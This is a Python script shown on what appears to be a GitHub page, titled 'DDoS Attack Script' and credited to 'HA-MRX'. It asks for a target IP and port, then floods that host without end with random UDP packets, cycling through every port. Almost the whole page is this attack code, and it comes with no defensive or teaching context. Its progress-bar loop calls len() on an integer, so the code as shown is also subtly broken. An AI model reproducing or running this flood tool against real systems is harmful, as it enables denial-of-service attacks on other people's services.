-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDDOS_Attack_Script.py
47 lines (39 loc) · 1.07 KB
/
DDOS_Attack_Script.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from datetime import datetime
import sys
import os
import time
import socket
import random
# Code Time
now = datetime.now()
hour, minute, day, month, year = now.hour, now.minute, now.day, now.month, now.year
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
# Clear the screen
os.system("clear")
# Print header
print("DDoS Attack Script")
print("Author : HA-MRX")
print("You Tube : https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA")
print("github : https://github.com/Ha3MrX")
print("Facebook : https://www.facebook.com/muhamad.jabar222")
print()
# Get the target IP and port from the user
ip = input("IP Target : ")
port = int(input("Port : "))
# Clear the screen
os.system("clear")
print("Attack Starting")
# Attack loop
for _ in range(5):
time.sleep(5)
print(f"[{'=' * (len(_) + 1)}{' ' * (4 - len(_))}] {_ * 25}%")
sent = 0
while True:
sock.sendto(bytes, (ip, port))
sent += 1
port += 1
print(f"Sent {sent} packet to {ip} through port: {port}")
if port == 65534:
port = 1